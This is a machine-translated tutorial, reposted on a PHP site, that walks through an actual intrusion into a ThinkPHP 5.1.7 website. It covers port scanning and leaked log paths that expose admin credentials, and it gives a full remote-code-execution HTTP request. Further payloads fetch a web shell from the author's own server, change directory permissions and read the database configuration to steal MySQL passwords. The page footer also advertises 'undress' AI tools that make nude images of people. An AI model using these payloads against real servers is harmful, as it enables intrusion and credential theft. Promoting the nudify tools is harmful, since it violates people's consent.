search
HomePHP FrameworkThinkPHPRemember a practical penetration of the ThinkPHP framework

The followingthinkphp frameworkThe tutorial column will share with you a practical penetration of the ThinkPHP framework. I hope it will be helpful to friends in need!

Information collection

Find a website http://x.x.x.x/ and start penetrating it

First use nmap to scan the port open to the victim server to detect the port

Remember a practical penetration of the ThinkPHP framework

You can see the open ports as follows
Remember a practical penetration of the ThinkPHP framework

The port is the unique identification id of the application in computer communication. Through the port we You can know what services are opened by the victim server

For example, 3306 is mysql and has enabled external connections. Next, we will check the port access to see what services are opened.

8080 has opened phpmyadmin. We can use the PHP connection mysql tool to crack the mysql password

Remember a practical penetration of the ThinkPHP framework

8082 is a loan homepage

Remember a practical penetration of the ThinkPHP framework

Enter any number that is not Existing routes and then check the error information such as http://x.x.x.x/gfvhf

Remember a practical penetration of the ThinkPHP framework

## Successful error: The version of the thinkphp framework is 5.1.7 (this version has an injection vulnerability)

Remember a practical penetration of the ThinkPHP framework

8084 is a background that continues to collect

Remember a practical penetration of the ThinkPHP framework

8092 is a background, because the deployment is not standardized, there is thinkphp log leakage, the path is http ://x.x.x.x:8092/runtime/log/202112/19.log You can check the account and password that the administrator has logged in to.

Here we talk about black products using the thinkphp framework. Because the operation and maintenance is half-baked, it is very likely that the thinkphp log will be leaked

tp5-6 payload: domain name/runtime/log/202112/19.log (

The following 202112/19.log changes based on the current date)

tp3 payload: Domain name/Application/Runtime/Logs/Home/21_12_19.log (

The following 21_12_19.log is According to the )

Remember a practical penetration of the ThinkPHP framework

Remember a practical penetration of the ThinkPHP framework

Remember a practical penetration of the ThinkPHP framework

Remember a practical penetration of the ThinkPHP framework

Remember a practical penetration of the ThinkPHP framework

################ ### ###############Information collection completed and precise attack######Open burp, then use packet capture, and then forward the data packet to the Repeater module of burp to capture the packet content Replace it with the following content ###### The principle of the vulnerability will not be explained in detail. No PHP architecture layer can understand it. A brief description is that a variable overwrite causes code execution. ######Thinkphp5 vulnerability poc can refer to https://y4er.com/post/thinkphp5-rce/######The content of the following packet is to trigger the vulnerability and let the server Execute phpinfo()###
POST /index.php?s=captcha&echod=phpinfo() HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=iar4j14536rat57j1d5018qjtt8vj69g
Content-Type:application/x-www-form-urlencoded
Content-Length: 77

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod
###The execution is successful and you can see some detailed information of php##############Start writing the shell below and replace the request header with: ## #
POST /index.php s=captcha&echod=copy('http://x.x.x.x/2.txt','t2.php') HTTP/1.1
###It means to download the remote shell file http://x.x.x.x/2.txt on my server and write it to t2.php in the current web directory######But when I visit t2.php, When a 404 appears, I guess it means that the current directory does not have write permissions######So I tried to give write permissions:###
POST /index.php?s=captcha&echod=chmod('./',0777) HTTP/1.1
###I found that I still couldn’t write the shell, and the PHP permissions were very low. ######Replace chmod('./',0777) with readfile('../application/database.php') to read the database configuration file. It was found that the mysql account password was successfully obtained. ###############Use the phpmyadmin service we discovered before to log in and then open mysql for external connection######Use the mysql management tool to connect and find a bunch of databases. And mysql directly has root permissions, which can elevate the server (lateral penetration of the intranet), etc. Anyway, the external network has opened an opening, so I won’t go into depth here. ############

Summary

Summarize some of the ideas I have figured out myself: if thinkphp turns on debug mode and the server turns on database external connections, it can send a large number of requests by blasting the mysql service (Let mysql block up), when the thinkphp connection to mysql times out, a connection exception error will be reported, and the mysql account password will be output to the page.

Recommended study: "thinkphp video tutorial"

The above is the detailed content of Remember a practical penetration of the ThinkPHP framework. For more information, please follow other related articles on the PHP Chinese website!

Statement
This article is reproduced at:freebuf. If there is any infringement, please contact admin@php.cn delete
thinkphp是不是国产框架thinkphp是不是国产框架Sep 26, 2022 pm 05:11 PM

thinkphp是国产框架。ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。

一起聊聊thinkphp6使用think-queue实现普通队列和延迟队列一起聊聊thinkphp6使用think-queue实现普通队列和延迟队列Apr 20, 2022 pm 01:07 PM

本篇文章给大家带来了关于thinkphp的相关知识,其中主要介绍了关于使用think-queue来实现普通队列和延迟队列的相关内容,think-queue是thinkphp官方提供的一个消息队列服务,下面一起来看一下,希望对大家有帮助。

thinkphp的mvc分别指什么thinkphp的mvc分别指什么Jun 21, 2022 am 11:11 AM

thinkphp基于的mvc分别是指:1、m是model的缩写,表示模型,用于数据处理;2、v是view的缩写,表示视图,由View类和模板文件组成;3、c是controller的缩写,表示控制器,用于逻辑处理。mvc设计模式是一种编程思想,是一种将应用程序的逻辑层和表现层进行分离的方法。

实例详解thinkphp6使用jwt认证实例详解thinkphp6使用jwt认证Jun 24, 2022 pm 12:57 PM

本篇文章给大家带来了关于thinkphp的相关知识,其中主要介绍了使用jwt认证的问题,下面一起来看一下,希望对大家有帮助。

thinkphp扩展插件有哪些thinkphp扩展插件有哪些Jun 13, 2022 pm 05:45 PM

thinkphp扩展有:1、think-migration,是一种数据库迁移工具;2、think-orm,是一种ORM类库扩展;3、think-oracle,是一种Oracle驱动扩展;4、think-mongo,一种MongoDb扩展;5、think-soar,一种SQL语句优化扩展;6、porter,一种数据库管理工具;7、tp-jwt-auth,一个jwt身份验证扩展包。

thinkphp 怎么查询库是否存在thinkphp 怎么查询库是否存在Dec 05, 2022 am 09:40 AM

thinkphp查询库是否存在的方法:1、打开相应的tp文件;2、通过“ $isTable=db()->query('SHOW TABLES LIKE '."'".$data['table_name']."'");if($isTable){...}else{...}”方式验证表是否存在即可。

一文教你ThinkPHP使用think-queue实现redis消息队列一文教你ThinkPHP使用think-queue实现redis消息队列Jun 28, 2022 pm 03:33 PM

本篇文章给大家带来了关于ThinkPHP的相关知识,其中主要整理了使用think-queue实现redis消息队列的相关问题,下面一起来看一下,希望对大家有帮助。

thinkphp3.2怎么关闭调试模式thinkphp3.2怎么关闭调试模式Apr 25, 2022 am 10:13 AM

在thinkphp3.2中,可以利用define关闭调试模式,该标签用于变量和常量的定义,将入口文件中定义调试模式设为FALSE即可,语法为“define('APP_DEBUG', false);”;开启调试模式将参数值设置为true即可。

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

Repo: How To Revive Teammates
1 months agoBy尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

SAP NetWeaver Server Adapter for Eclipse

SAP NetWeaver Server Adapter for Eclipse

Integrate Eclipse with SAP NetWeaver application server.

Dreamweaver Mac version

Dreamweaver Mac version

Visual web development tools

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

Powerful PHP integrated development environment

Atom editor mac version download

Atom editor mac version download

The most popular open source editor

SublimeText3 Linux new version

SublimeText3 Linux new version

SublimeText3 Linux latest version